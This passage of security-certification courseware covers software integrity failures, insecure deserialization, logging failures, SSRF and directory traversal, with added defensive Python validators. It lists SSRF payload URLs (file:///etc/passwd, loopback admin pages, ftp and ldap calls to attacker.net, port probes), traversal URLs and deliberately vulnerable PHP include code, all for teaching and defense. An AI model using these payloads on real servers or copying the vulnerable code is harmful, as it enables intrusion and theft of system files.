because of weak hashing algorithms. Further, attackers can gain access to the web
application's password database if user passwords are not encrypted, which allows the
attackers to exploit every user's password. Once attackers compromise a system, they
can perform various malicious activities such as session hijacking and user
impersonation.
■ Timeout Exploitation

If the session timeout is long and the session IDs are not changed after every login,
attackers may hijack a session and take control of it with the same privileges as the
victim. If an application's session timeouts are set to long durations, the sessions will
last until the time specified, that is, the session will be valid for a long period. When the
user closes the browser without logging out from sites accessed through a public
computer, the attacker can use the same browser later to conduct the attack, as
session IDs can remain valid; thus, they can exploit the user's privileges.
o Example:
A user logs into www.certifiedhacker.com using their credentials. After performing
certain tasks, they close the web browser without logging out of the page. The web
application's session timeout is set to 2 h. During the specified session interval, if an
attacker has physical access to the user's system, they may then launch the browser,
check the history, and click the www.certifiedhacker.com link, which automatically
redirects the attacker to the user account without the need to enter the user
credentials.


A08 - Software and Data Integrity Failures


Software and data integrity failures occur when organizations fail to update the applications' software with the latest versions
or patches
Web applications rely on plugins, dependencies, libraries, or packages that can be installed from public repositories, content
delivery networks (CDNs), or untrusted sources, which makes them vulnerable to attacks
The common security weaknesses in this category include functionality from an untrusted control sphere, the download of a
code without an integrity check, and the deserialization of untrusted data

[Slide figure: the attacker installs malicious code into the CI/CD pipeline between the source-code repository and the
application; the user then downloads and installs the malicious code.]

A08 - Software and Data Integrity Failures


Software and data integrity failures occur when organizations fail to update the applications'
software with the latest versions or patches. Often, web applications rely on plugins,
dependencies, libraries, or packages that can be installed from public repositories, content
delivery networks (CDNs), or untrusted sources, which makes them vulnerable to attacks.
Most organizations implement automatic software update functionalities that update or patch
previously trusted applications without any verification. Therefore, developers must take the
utmost care in auditing the code, securing CI/CD pipelines, and using third-party libraries from
trusted repositories. They should also ensure that serialized data are sent with encryption or
signatures. If the software is corrupted, it can cause great damage with abnormal behavior in
real-time environments or the exposure of application components.
The common security weaknesses in this category include the inclusion of functionalities from
an untrusted control sphere, download of code without integrity checks, and deserialization of
untrusted data.
The following are some exploits that can be performed using software and data integrity
failures:
■ Cache poisoning
■ Code injection
■ Command execution
■ Denial of service
■ Data theft
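The following Python example is added here to illustrate the "download of code without an integrity check" weakness and its countermeasure; it is not code from the EC-Council courseware. An update is accepted only if its SHA-256 digest matches a pinned value. The fetch callback, the artifact bytes, and the pinned digest are constructed for the example; in a real deployment the digest would come from a signed manifest obtained over a channel separate from the download itself.

```python
# Added example (not from the courseware): an integrity check on a fetched
# update before it is used, for the "download of code without an integrity
# check" weakness above. The fetch callback, the artifact bytes and the
# pinned digest are constructed; in practice the digest comes from a signed
# manifest obtained over a separate trusted channel.
import hashlib
import hmac
from typing import Callable


class IntegrityError(Exception):
    """Raised when a fetched artifact does not match its pinned digest."""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def install_artifact(fetch: Callable[[str], bytes], name: str, expected_sha256: str) -> bytes:
    """Fetch `name` and return its bytes only if the SHA-256 digest matches."""
    blob = fetch(name)
    actual = sha256_hex(blob)
    # compare_digest keeps the comparison constant-time regardless of mismatch position
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise IntegrityError("%s: expected %s, got %s" % (name, expected_sha256, actual))
    return blob


# Constructed artifacts: the build the release manifest was made from, and a
# copy altered by a compromised pipeline stage or mirror.
TRUSTED_BUILD = b"#!/bin/sh\necho 'update v1.2'\n"
TAMPERED_BUILD = TRUSTED_BUILD + b"# extra line inserted after the manifest was signed\n"
PINNED_DIGEST = sha256_hex(TRUSTED_BUILD)   # stands in for the manifest value


def install_from(serve_tampered: bool) -> bool:
    """Simulate an update from a clean or a tampered source; True if installed."""
    def fetch(_name: str) -> bytes:
        return TAMPERED_BUILD if serve_tampered else TRUSTED_BUILD
    try:
        install_artifact(fetch, "update.sh", PINNED_DIGEST)
        return True
    except IntegrityError:
        return False
```

A hash pin only helps when the pinned value cannot be altered by whoever can alter the download, which is why the digest belongs in a signed manifest or lock file rather than next to the artifact on the same mirror; the same check applies to packages pulled from public repositories and CDNs, where lock files with recorded hashes play the role of the manifest.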


Example
Attackers leverage the insecure CI/CD pipeline of an organization to install and distribute
malicious code. The client unintentionally downloads and installs this software from the
organization's servers without validating its integrity. Now, attackers use the malicious code in
the client network to gain complete remote access.

[Figure: the attacker installs malicious code into the CI/CD pipeline (source-code repository → CI/CD pipeline → application); the user downloads and installs the malicious code, and the attacker gains remote access via the malicious code]

Figure 14.26: Scenario of software and data integrity failure


Insecure Deserialization

■ Data serialization and deserialization is an effective process of linearizing and de-linearizing data objects for transmission to other networks or systems
■ Attackers inject malicious code into serialized data and forward the malicious serialized data to the victim
■ Insecure deserialization deserializes the malicious serialized content along with the injected malicious code, compromising the system or network

[Slide figure: the Employee object (Name Rinni, Age 26, City Nevada, EmpID 2201) is serialized to <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>; the attacker injects malicious code into the serialized data, giving <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>; insecure deserialization recreates the Employee object and runs the malicious procedure]

Insecure Deserialization
As data in the computer is stored in the form of data structures (graph, trees, array, etc.), data
serialization and deserialization is an effective process for linearizing and de-linearizing data
objects to transport them to other networks or systems.
■ Serialization

Consider an example of an object "Employee" (for the Java platform), where the Employee
object consists of data such as name, age, city, and EmpID. Due to the process of
serialization, the object data will be converted into the following linear format for
transportation to different systems or different nodes of a network.
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201
</EmpID></Employee>


[Figure: the Employee object (Name Rinni, Age 26, City Nevada, EmpID 2201) is serialized to <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>]

Figure 14.27: Serialization process

■ Deserialization

Deserialization is the reverse process of serialization, whereby the object data is
recreated from the linear serialized data. Due to the process of deserialization, the
serialized Employee object given in the abovementioned example will be reconverted
into the object data as shown in the figure below:

[Figure: <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee> is deserialized back into the Employee object (Name Rinni, Age 26, City Nevada, EmpID 2201)]

Figure 14.28: Deserialization process


■ Insecure Deserialization
This process of serialization and deserialization is effectively used in communication
between networks, and its widespread usage attracts attackers to exploit the flaws in
this process. Attackers inject malicious code into serialized linear formatted data and
forward the malicious serialized data to the victim. An example of malicious code
injection into serialized linear data by the attacker is shown below:
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>

Due to insecure deserialization, the injected malicious code will be undetected and
remain present in the final execution of the deserialization code. This results in the
execution of malicious procedures along with the execution of serialized data, as shown
in the following figure:

[Figure: the attacker injects malicious code into the serialized data, <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>; insecure deserialization rebuilds the Employee object (Name Rinni, Age 26, City Nevada, EmpID 2201) and also runs the malicious procedure]

Figure 14.29: Insecure Deserialization attack

This could have a severe impact on the system, as it would allow the attacker to execute
code on the system remotely. Moreover, any software or server vulnerable to
deserialization attacks could be adversely affected.
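The following Python example is added here to show the defensive counterpart of the serialization and insecure deserialization discussion above; it is not the courseware's code, which refers to the Java platform. It serializes the Employee object to the same linear format and deserializes it with a strict parser that accepts only the four known child elements, typed values, and no stray text, so the injected "MALICIOUS PROCEDURE" content from the example is rejected rather than carried into the rebuilt object. The class and function names are assumptions; the benign and tampered inputs are constructed to match the courseware example.

```python
# Added example (not from the courseware): strict, schema-bound deserialization
# of the <Employee> record used in the example. Names are assumptions; the
# sample documents are constructed to match the text.
from dataclasses import dataclass
import xml.etree.ElementTree as ET


@dataclass(frozen=True)
class Employee:
    name: str
    age: int
    city: str
    emp_id: int


def serialize(e: Employee) -> str:
    """Linearize an Employee into the <Employee>...</Employee> format."""
    root = ET.Element("Employee")
    for tag, value in (("Name", e.name), ("Age", e.age), ("City", e.city), ("EmpID", e.emp_id)):
        ET.SubElement(root, tag).text = str(value)
    return ET.tostring(root, encoding="unicode")


_EXPECTED = ("Name", "Age", "City", "EmpID")


class DeserializationError(ValueError):
    """Input does not match the Employee schema exactly."""


def deserialize(xml_text: str) -> Employee:
    """Rebuild an Employee, refusing anything outside the known schema."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise DeserializationError(f"malformed input: {exc}") from exc
    if root.tag != "Employee":
        raise DeserializationError(f"unexpected root element {root.tag!r}")
    if (root.text or "").strip():
        raise DeserializationError("unexpected text inside <Employee>")
    tags = tuple(child.tag for child in root)
    if tags != _EXPECTED:          # no missing, extra or reordered fields
        raise DeserializationError(f"unexpected element set {tags}")
    values = {}
    for child in root:
        # nested elements or trailing text after a field is exactly where the
        # injected "MALICIOUS PROCEDURE" from the example ends up
        if len(child) or (child.tail or "").strip():
            raise DeserializationError(f"unexpected content after <{child.tag}>")
        values[child.tag] = (child.text or "").strip()
    try:
        age = int(values["Age"])
        emp_id = int(values["EmpID"])
    except ValueError as exc:
        raise DeserializationError("Age and EmpID must be integers") from exc
    if not (0 < age < 150) or not values["Name"]:
        raise DeserializationError("field out of range")
    return Employee(values["Name"], age, values["City"], emp_id)


# Constructed inputs matching the courseware example
BENIGN = ("<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City>"
          "<EmpID>2201</EmpID></Employee>")
TAMPERED = ("<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City>"
            "<EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>")


def is_accepted(xml_text: str) -> bool:
    try:
        deserialize(xml_text)
        return True
    except DeserializationError:
        return False
```

The shape of the mitigation is the same whatever the wire format: the receiver reconstructs plain data into a type it chose in advance, never a type or behaviour named by the input. That is the difference between this parser and native object serialization such as Java's ObjectInputStream, where the serialized stream itself selects which classes get instantiated and whose code runs during reconstruction.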


A09 - Security Logging and Monitoring Failures/Insufficient Logging and Monitoring

■ Web applications maintain logs to track usage patterns, such as user and admin login credentials
■ Security logging and monitoring failures cover application weaknesses such as insufficient logging, improper output neutralization for logs, exclusion of security-relevant information, and addition of sensitive information to log files
■ Insufficient logging and monitoring refer to the scenario where the detection software either does not record the malicious event or ignores important details about the event
■ Attackers usually inject, delete, or tamper the web application logs to engage in malicious activities or hide their identities

[Slide figure: the attacker's malicious attempts pass through a web application with insufficient logging and gain access to confidential data in the database]

A09 - Security Logging and Monitoring Failures/Insufficient Logging and Monitoring
Web applications maintain logs to track usage patterns, such as user and admin login
credentials. Security logging and monitoring failures cover application weaknesses such as
insufficient logging, improper output neutralization for logs, exclusion of security-relevant
information, and addition of sensitive information to log files.
Insufficient logging and monitoring refer to scenarios in which the detection software either
fails to record a malicious event or ignores important details about the event. Attackers usually
inject, delete, or tamper with web application logs to engage in malicious activities or hide their
identities. Insufficient logging and monitoring make it difficult to detect the attacker's malicious
attempts, so the attacker can perform attacks such as password brute-forcing to steal
confidential passwords.

[Figure: the attacker's malicious attempts pass through a web application with insufficient logging and gain access to confidential data in the database without being noticed]

Figure 14.30: Attack on a web application with insufficient logging and monitoring


Given below are a few causes of security logging and monitoring failures:
■ Logs that do not provide information about overall logins, failed login attempts, and
important transactions.
■ Warnings and error messages that provide vague and insufficient log information.
■ Inappropriate monitoring of applications and API logs.
■ Local storage of logs.
■ Improper or no implementation of response escalation processes.
■ Dynamic application security testing (DAST) tools such as OWASP ZAP that fail to
generate alerts.
■ Web applications that are not capable of detecting, escalating, or issuing alerts of
suspicious activities in real time.
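The following Python example is added here to make two of the points above concrete: logging failed login attempts in a form that can be monitored, and neutralizing user-controlled values before they reach the log. It is not code from the EC-Council courseware. The detection logic runs over constructed authentication log lines and raises an alert once a source address reaches five failures within five minutes, and again if that source then logs in successfully. The line format, the threshold, the window, and the addresses (taken from the documentation ranges) are assumptions.

```python
# Added example (not from the courseware): detection logic run over
# constructed authentication log lines, plus output neutralization so a
# crafted username cannot forge log entries. The line format, the
# threshold of 5 failures per 5 minutes and the addresses are assumptions.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) auth (?P<result>OK|FAIL) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def neutralize(value: str) -> str:
    """Escape newlines and other control characters before logging user input."""
    return "".join(
        c if c.isprintable() and c not in "\r\n" else "\\x%02x" % ord(c)
        for c in value
    )


def format_event(ts: datetime, result: str, user: str, src: str) -> str:
    """Render one auth event in the line format LINE_RE parses."""
    return "%s auth %s user=%s src=%s" % (
        ts.strftime("%Y-%m-%dT%H:%M:%S"), result, neutralize(user), src)


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (kind, src, timestamp) tuples.

    'burst' fires once a source reaches `threshold` failures inside `window`;
    'success-after-burst' fires if that source then logs in successfully.
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                 # unparsable lines deserve their own counter
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        src = m["src"]
        if m["result"] == "OK":
            if src in flagged:
                alerts.append(("success-after-burst", src, ts))
            continue
        q = failures[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged.add(src)
            alerts.append(("burst", src, ts))
    return alerts


# Constructed sample log (documentation address ranges, not real hosts)
SAMPLE_LOG = [
    "2024-05-01T10:00:01 auth FAIL user=admin src=203.0.113.7",
    "2024-05-01T10:00:03 auth FAIL user=admin src=203.0.113.7",
    "2024-05-01T10:00:04 auth OK user=bob src=198.51.100.2",
    "2024-05-01T10:00:06 auth FAIL user=admin src=203.0.113.7",
    "2024-05-01T10:00:09 auth FAIL user=root src=203.0.113.7",
    "2024-05-01T10:00:12 auth FAIL user=admin src=203.0.113.7",
    "2024-05-01T10:00:15 auth OK user=admin src=203.0.113.7",
    "2024-05-01T10:30:00 auth FAIL user=alice src=198.51.100.2",
]

if __name__ == "__main__":
    for kind, src, ts in detect_bruteforce(SAMPLE_LOG):
        print(kind, src, ts.isoformat())
```

The "success-after-burst" alert is the one worth escalating: a burst of failures alone may be a forgotten password, but a success from the same source right after it is the signature of a brute-force that worked. Note that the log line records the username but never the submitted password, which addresses the "addition of sensitive information to log files" weakness listed above.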


A10 - Server-Side Request Forgery (SSRF)

■ Attackers exploit SSRF vulnerabilities in a public web server to send crafted requests to the internal or backend servers
■ Once the attack is successful, the attackers can perform various activities such as port scanning, network scanning, IP address discovery, reading web server files, and bypassing host-based authentication

[Slide figure: the attacker sends a crafted request to the public web server; the web server sends the request on behalf of the user to the internal server behind the firewall, and the internal server responds with data; the firewall blocks direct communication between the attacker and the internal server]

A10 - Server-Side Request Forgery (SSRF) (Cont'd)

Injecting an SSRF Payload
■ It involves selecting a parameter and inserting an SSRF payload that can support a file or URL
■ Examples:
o Gaining access to internal resources: attackers can gain access to internal resources through the /admin panel from the internal network. It allows them to access the files from the server via the file://path/to/file schema
o Gaining access to internal pages: https://www.certifiedhacker.com/page?url=http://127.0.0.1/admin
o Using a URL scheme to access internal files: https://www.certifiedhacker.com/page?url=file://etc/passwd

Cross-Site Port Attack (XSPA)
■ XSPA allows attackers to scan for the open ports of a server
■ Attackers can use scanned ports such as ports 21, 22, and 25, along with the loopback interface
■ Examples:
o https://www.certifiedhacker.com/page?url=http://localhost:22/
o https://www.certifiedhacker.com/page?url=http://127.0.0.1:25/
o https://www.certifiedhacker.com/page?url=http://127.0.0.1:3389/

A10 - Server-Side Request Forgery (SSRF)


Attackers exploit server-side request forgery (SSRF) vulnerabilities, which evolve from the
unsafe use of functions in an application, in public web servers to send crafted requests to
internal or backend servers. Internal servers usually employ firewalls to prevent unwanted
traffic inflows to the network. Therefore, attackers leverage SSRF vulnerabilities in Internet-
facing web servers to gain access to backend servers that are protected by a firewall, VPN, or
access-control lists (ACLs). The backend server believes that the request is made by the web


server because these servers are on the same network; consequently, the backend server
responds with the data stored in it.
SSRF vulnerabilities evolve in the following manner. Generally, server-side requests are initiated
to obtain information from an external resource and feed it into an application. For instance, a
designer can utilize a URL such as https://xyz.com/feed.php?url=externalsite.com/feed/ to
obtain a remote feed. If attackers can alter the URL input to the localhost, then they can view
all the local resources on the server.
Once the attack is successful, attackers can perform various activities such as port scanning,
network scanning, IP address discovery, reading of web server files, bypassing of host-based
authentication, interaction with critical protocols, and remote code execution.

[Figure: the attacker's crafted request reaches the web server; the web server sends the request on behalf of the user to the internal server, which responds with data; the firewall blocks direct communication between the attacker and the internal server and the internal database server]

Figure 14.31: Illustration of an SSRF attack

Types of SSRF Attacks


■ Injecting an SSRF payload
This attack involves selecting a parameter and inserting an SSRF payload that can
support a file or URL. It allows attackers to make certain modifications to the header
field and change it to plaintext. The new payload is then inserted into the parameter in
place of a file.
o Gaining access to internal resources
Attackers can gain access to internal resources through the /admin panel from the
internal network. This allows them to access the files from the server via the
file://path/to/file schema.
o Gaining access to internal pages
Attackers can use the following exploits to access internal pages:
• https://www.certifiedhacker.com/page?url=http://127.0.0.1/admin


• https://www.certifiedhacker.com/page?url=http://127.0.0.1/pgadmin
• https://www.certifiedhacker.com/page?url=http://127.0.0.1/any_interesting_page
• https://www.certifiedhacker.com/page?url=http://127.0.0.1/phpmyadmin
o Using a URL scheme to access internal files
Attackers can access files by exploiting a URL scheme of a server. This helps them
further attack its internal services. The following exploits can be used by attackers to
access internal files:
• https://www.certifiedhacker.com/page?url=file://etc/passwd
• https://www.certifiedhacker.com/page?url=file://\/\/etc/passwd
• https://www.certifiedhacker.com/page?url=file:///etc/passwd
• https://www.certifiedhacker.com/page?url=file://path/to/file
o Using a URL scheme to access internal services
Attackers can connect to different internal services by using a URL scheme. Some of
the exploits that can be used for this purpose are as follows.
For FTP
• https://www.certifiedhacker.com/page?url=ftp://attacker.net:11211/
• https://www.certifiedhacker.com/page?url=sftp://attacker.net:11111/
• https://www.certifiedhacker.com/page?url=tftp://attacker.net:123456/TESTUDP
Exploiting LDAP
• https://www.certifiedhacker.com/page?url=ldap://127.0.0.1/%0astats%0aquit
• https://www.certifiedhacker.com/page?url=ldap://localhost:11211/%0astats%0aquit
■ Cross-Site Port Attack (XSPA)
This type of SSRF attack allows attackers to scan for the open ports of a server. Attackers
use a loopback interface of that server such as localhost or 127.0.0.1.


Further, attackers can use scanned ports such as ports 21, 22, and 25, along with the
loopback interface.
The following are some examples:
o https://www.certifiedhacker.com/page?url=http://localhost:22/
o https://www.certifiedhacker.com/page?url=http://127.0.0.1:25/
o https://www.certifiedhacker.com/page?url=http://127.0.0.1:3389/
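The following Python example is added here to show how a server should validate the kind of url= parameter that the payloads above target; it is not code from the EC-Council courseware. The check allows only http and https to an allowlisted host on ports 80 and 443, resolves the host through an injectable resolver, and refuses any address that is not globally routable, so every payload class listed above (loopback, file://, ftp://, ldap://, and the XSPA port probes) is rejected before the server makes a request. The allowlisted host names, the fake resolver table, and the sample addresses are constructed.

```python
# Added example (not from the courseware): an allowlist check for a
# user-supplied fetch URL, the kind of url= parameter targeted by the
# payloads above. The allowlisted hosts, the fake resolver table and the
# sample addresses are constructed.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"feeds.example.net", "cdn.example.net"}   # constructed allowlist
ALLOWED_PORTS = {80, 443}


def _is_public(addr: str) -> bool:
    """True only for globally routable addresses: no loopback, RFC 1918, link-local, etc."""
    return ipaddress.ip_address(addr).is_global


def validate_fetch_url(url: str, resolve, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return a normalized URL that is safe to fetch, or raise ValueError."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:            # file://, ftp://, ldap://, ...
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    host = parts.hostname                         # lower-cased, IPv6 brackets removed
    if not host:
        raise ValueError("missing host")
    if parts.username or parts.password:         # http://allowed@evil/ style tricks
        raise ValueError("credentials in URL not allowed")
    if host not in allowed_hosts:                 # also rejects 127.0.0.1 and localhost
        raise ValueError("host not in allowlist: %r" % host)
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:                 # blocks XSPA-style :22, :25, :3389 probes
        raise ValueError("port not allowed: %d" % port)
    addrs = list(resolve(host))
    if not addrs:
        raise ValueError("host does not resolve: %r" % host)
    for addr in addrs:                            # every record, not just the first
        if not _is_public(addr):
            raise ValueError("%s resolves to non-public address %s" % (host, addr))
    query = "?" + parts.query if parts.query else ""
    return "%s://%s:%d%s%s" % (scheme, host, port, parts.path or "/", query)


# Constructed resolver standing in for DNS; cdn.example.net has one record
# that points inside the network, which is enough to refuse it.
FAKE_DNS = {
    "feeds.example.net": ["93.184.216.34"],
    "cdn.example.net": ["93.184.216.35", "10.0.0.5"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def is_safe(url: str) -> bool:
    try:
        validate_fetch_url(url, fake_resolve)
        return True
    except ValueError:
        return False


# The payload URLs from the examples above, reduced to their url= value
PAGE_PAYLOADS = [
    "http://127.0.0.1/admin",
    "file://etc/passwd",
    "file:///etc/passwd",
    "http://localhost:22/",
    "http://127.0.0.1:3389/",
    "ftp://attacker.net:11211/",
    "ldap://127.0.0.1/%0astats%0aquit",
]
```

Two caveats belong with this check. The address validated here must be the address actually connected to (pin it for the outgoing request or resolve inside the HTTP client), otherwise a second DNS lookup between validation and connection reopens the hole; and redirects from the fetched host must go through the same validation, since an allowlisted public server can answer with a 302 to an internal address.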


Other Web Application Threats

■ Directory Traversal
■ Unvalidated Redirects and Forwards
■ Watering Hole Attack
■ Cross-Site Request Forgery
■ Cookie/Session Poisoning
■ Web Service Attacks
■ Cookie Snooping
■ Hidden Field Manipulation
■ Obfuscation Application
■ Denial-of-Service (DoS)
■ Buffer Overflow
■ CAPTCHA Attacks
■ Platform Exploits
■ Network Access Attacks
■ DMZ Protocol Attacks
■ Web-based Timing Attacks
■ MarioNet Attack
■ RC4 NOMORE Attack
■ Clickjacking Attack
■ JavaScript Hijacking
■ DNS Rebinding Attack
■ Same-Site Attack
■ Pass-the-Cookie Attack

Other Web Application Threats


Web application threats are not limited to attacks based on URL and port 80. Regardless of the
ports, protocols, and OSI layers in use, vendors must protect the integrity of mission-critical
applications from possible future attacks by being able to deal with all attack methods.
The various types of web application threats are as follows:
■ Directory Traversal

Attackers exploit HTTP by directory traversal, which gives them access to restricted
directories; they execute commands outside the web server's root directory.
■ Unvalidated Redirects and Forwards

Attackers lure victims into clicking on unvalidated links that appear to be legitimate.
Such redirects may attempt to install malware or trick victims into disclosing passwords
or other sensitive information. Unsafe forwards may allow access control bypass,
leading to
o Session Fixation Attack
o Security Management Exploits
o Failure to Restrict URL Access
o Malicious File Execution
■ Watering Hole Attack

It is a type of unvalidated redirect attack whereby the attacker first identifies the most
visited website of the target, determines the vulnerabilities in the website, injects


malicious code into the vulnerable web application, and then waits for the victim to
browse the website. Once the victim tries to access the website, the malicious code
executes, infecting the victim.
■ Cross-Site Request Forgery
The cross-site request forgery method is a type of attack in which an authenticated user
is made to perform certain tasks on the web application that an attacker chooses, e.g., a
user clicking on a particular link sent through an email or chat.
■ Cookie/Session Poisoning
By changing the information inside a cookie, attackers bypass the authentication
process. Once they gain control over a network, they can modify its content, use the
system for a malicious attack, or steal information from users' systems.
■ Web Service Attacks
An attacker can get into the target web application by exploiting an application
integrated with vulnerable web services. An attacker injects a malicious script into a
web service and can then disclose and modify application data.
■ Cookie Snooping
Attackers use cookie snooping on victims' systems to analyze the users' surfing habits
and sell that information to other attackers or to launch various attacks on the victims'
web applications.
■ Hidden Field Manipulation
Attackers attempting to compromise e-commerce websites mostly perform such
attacks. They manipulate hidden fields and change the data stored in them. Several
online stores face such problems every day. Attackers can alter prices and conclude
transactions, designating prices of their choice.
■ Obfuscation Application
Attackers are usually careful to hide their attacks and avoid detection. Network and
host-based intrusion detection systems (IDSs) constantly look for signs of well-known
attacks, driving attackers to seek different ways to remain undetected. The most
common method of attack obfuscation involves encoding portions of the attack with
Unicode, UTF-8, Base64, or URL encoding. Unicode is a method of representing letters,
numbers, and special characters to properly display them, regardless of the application
or underlying platform.
■ Denial-of-Service (DoS)
A DoS attack is an attack on the availability of a service, which reduces, restricts, or
prevents access to system resources by its legitimate users. For instance, a website
related to a banking or email service may not be able to function for a few hours or even
days, resulting in the loss of time and money.


■ Buffer Overflow

A web application's buffer overflow vulnerability occurs when it fails to guard its buffer
properly and allows writing beyond its maximum size.
■ CAPTCHA Attacks

CAPTCHA is a challenge-response type of test implemented by web applications to


check whether the response is generated by a computer. Although CAPTCHAs are
designed to be unbreakable, they are prone to various types of attacks.
■ Platform Exploits

Users can build various web applications using different platforms such as BEA
Weblogic and Cold Fusion. Each platform has various vulnerabilities and exploits
associated with it.
■ Network Access Attacks

Network access attacks can majorly affect web applications, including a basic level of
service. They can also allow levels of access that standard HTTP application methods
cannot grant.
■ DMZ Protocol Attacks

The demilitarized zone (DMZ) is a semi-trusted network zone that separates the
untrusted Internet from the company's trusted internal network. An attacker who can
compromise a system that allows other DMZ protocols has access to other DMZs and
internal systems. This level of access can lead to
o Compromise of the web application and data
o Defacement of websites
o Access to internal systems, including databases, backups, and source code
■ Web-based Timing Attacks
Web-based timing attacks exploit side-channel leakage and estimate the amount of time
taken for secret key operations. Attackers perform these attacks to retrieve usernames
and passwords for accessing web applications.
■ MarioNet Attack

Attackers abuse the Service Workers API to inject and run malicious code in the victim's
browser to perform various attacks such as cryptojacking, DDoS, click fraud, and
distributed password cracking.
■ RC4 NOMORE Attack

A Rivest Cipher Numerous Occurrence MOnitoring and Recovery Exploit (RC4 NOMORE)
attack is an attack against the RC4 stream cipher. This attack exploits the vulnerabilities
present in a web server that uses the RC4 encryption algorithm for accessing encrypted
sensitive information. Attackers use RC4 NOMORE to decrypt the web cookies secured
by the HTTPS protocol and inject arbitrary packets. After stealing a valid cookie, the


attacker impersonates the victim and logs into the website using the victim's credentials
to perform malicious activities and unauthorized transactions.
■ Clickjacking Attack
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then,
the attacker designs a page such that all the clickable items such as buttons are
positioned exactly as on the selected target website. When the victim clicks on the
invisible elements, the attacker performs various malicious actions.
■ JavaScript Hijacking
JavaScript hijacking, also known as JSON hijacking, is a vulnerability that enables
attackers to capture sensitive information from systems using JavaScript Object Notation
(JSON) as a data carrier. These vulnerabilities arise from flaws in the web browser's
same-origin policy that permits a domain to add code from another domain.
■ DNS Rebinding Attack
Attackers perform DNS rebinding attacks to bypass the same-origin policy's security
constraints and communicate with or make arbitrary requests to local domains through
a malicious web page.
■ Same-Site Attack
A same-site attack occurs when an attacker hosts a malicious website on the subdomain
of a legitimate application to trick users into navigating to a malicious website, from
which the attacker can collect sensitive data of the users.
■ Pass-the-Cookie Attack
The pass-the-cookie attack allows attackers to access a web application without
providing user credentials. Attackers steal cookies from the target user's browser and
inject those cookies into their session to bypass the authentication at the target server.


Directory Traversal

■ Directory traversal allows attackers to access restricted directories, including application source code, configuration, and critical system files to execute commands outside the web server's root application directory
■ Attackers can manipulate variables that reference files with "dot-dot-slash (../)" sequences and its variations
■ Accessing files located outside the web publishing directory using directory traversal
o http://www.certifiedhacker.com/process.aspx?page=../../../../some dir/some file
o http://www.certifiedhacker.com/../../../../some dir/some file
o http://www.certifiedhacker.com/GET/process.php./../../../../../../../../etc/passwd

[Slide figure: the attacker sends a directory traversal request to the server, and the server responds with password files; the vulnerable server code and the returned password file lines are reproduced in Figure 14.32]

Directory Traversal
When access is provided outside a defined application, there exists the possibility of
unintended information disclosure or modification. Complex applications are configured with
multiple directories that exist as application components and data. An application can traverse
these directories to locate and execute the legitimate portions of an application. A directory
traversal/forceful browsing attack occurs when the attacker is able to browse the directories
and files outside the normal application access. Such an attack exposes the directory structure
of an application and often the underlying web server and operating system. Directory traversal
allows attackers to access restricted directories, including application source code,
configuration, and critical system files, and execute commands outside the web server's root
directory. With this level of access to web application architecture, an attacker can
■ Enumerate the contents of files and directories
■ Access pages that otherwise require authentication (and possibly payment)
■ Gain secret knowledge of the application and its construction
■ Discover user IDs and passwords stored in hidden files
■ Locate source code and other interesting files left on the server
■ View sensitive data such as customer information
Example:

The following example uses "../" to go back several directories and obtain a file containing
the backup of a web application:
http://www.targetsite.com/../../../sitebackup.zip


This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user
account information:
http://www.targetsite.com/../../../../etc/passwd
Let us consider another example in which an attacker tries to access files located outside a web
publishing directory using directory traversal:
http://www.certifiedhacker.com/process.aspx?page=../../../../some dir/some file
http://www.certifiedhacker.com/../../../../some dir/some file
http://www.certifiedhacker.com/GET/process.php./../../../

The attacker sends the request ../../../../../etc/passwd; the server responds with the password file:
root:a98b24a1d3e8:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
Jason:a3b698a76f76d57.:182:100:Developer:/home/users/Jason/:/bin/csh
Vulnerable Server Code:
<?php
$theme = 'Jason.php';
if (isset($_COOKIE['THEME']))
    $theme = $_COOKIE['THEME'];
include("/home/users/certifiedhacker/Jason/" . $theme);
?>
Figure 14.32: Directory Traversal attack example
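The figure's include() concatenates the cookie value straight onto a directory, which is why ../ sequences escape it. The following added example (not EC-Council code; the theme directory is taken from the figure, the log lines are constructed, and the function names are assumed) contrasts that raw concatenation with a canonicalize-then-check lookup that also handles the URL-encoded and double-encoded forms of "..", and adds a small detector that flags traversal attempts in web server access logs:

```python
"""Directory traversal: the figure's raw include() path vs. a base-directory-bound lookup,
plus a detector for traversal patterns in access logs.
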